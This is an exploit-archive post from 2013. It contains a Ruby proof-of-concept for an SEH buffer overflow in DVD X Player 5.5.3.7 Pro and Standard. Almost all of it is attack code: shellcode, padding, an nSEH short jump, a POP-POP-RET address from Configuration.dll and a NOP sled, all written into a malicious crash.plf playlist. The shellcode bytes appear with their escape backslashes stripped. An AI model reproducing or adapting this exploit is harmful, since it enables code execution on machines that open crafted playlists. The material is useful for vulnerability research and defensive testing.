DVD X Player 5.5.3.7 Pro / Standard Buffer Overflow
Posted on 04 May 2013
#!/usr/bin/env ruby # Exploit Title:DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow # Download link :http://www.aviosoft.com/dvd-player.html # RST # Author: metacom # Date (found):03.05.2013 # Date (publish):03.05.2013 # version: 5.5.3.7 Pro & Standard # Category: poc # Tested on: windows 7 German # Notes: Last Update DVD X Player Jan 28, 2012 # SOLUTION: None calc = "xbax38xdcx15x77xddxc7xd9x74x24xf4x5dx33xc9" + "xb1x33x83xc5x04x31x55x0ex03x6dxd2xf7x82x71" + "x02x7ex6cx89xd3xe1xe4x6cxe2x33x92xe5x57x84" + "xd0xabx5bx6fxb4x5fxefx1dx11x50x58xabx47x5f" + "x59x1dx48x33x99x3fx34x49xcex9fx05x82x03xe1" + "x42xfexecxb3x1bx75x5ex24x2fxcbx63x45xffx40" + "xdbx3dx7ax96xa8xf7x85xc6x01x83xcexfex2axcb" + "xeexffxffx0fxd2xb6x74xfbxa0x49x5dx35x48x78" + "xa1x9ax77xb5x2cxe2xb0x71xcfx91xcax82x72xa2" + "x08xf9xa8x27x8dx59x3ax9fx75x58xefx46xfdx56" + "x44x0cx59x7ax5bxc1xd1x86xd0xe4x35x0fxa2xc2" + "x91x54x70x6ax83x30xd7x93xd3x9cx88x31x9fx0e" + "xdcx40xc2x44x23xc0x78x21x23xdax82x01x4cxeb" + "x09xcex0bxf4xdbxabxe4xbex46x9dx6cx67x13x9c" + "xf0x98xc9xe2x0cx1bxf8x9axeax03x89x9fxb7x83" + "x61xedxa8x61x86x42xc8xa3xe5x05x5ax2fxc4xa0" + "xdaxcax18" junk = "x41" * 601 # Junk bytes nseh = "xEBx06x90x90" # Short (6 bytes) jump! seh = "xB8x22x30x60"#0x603022B8 5E POP ESI from Configuration.dll nops = "x90" * 50 head = "http://" data= head + junk + nseh + seh + nops + calc File.open("crash.plf", 'w') do |b| b.write data puts "file size : " + data.length.to_s end
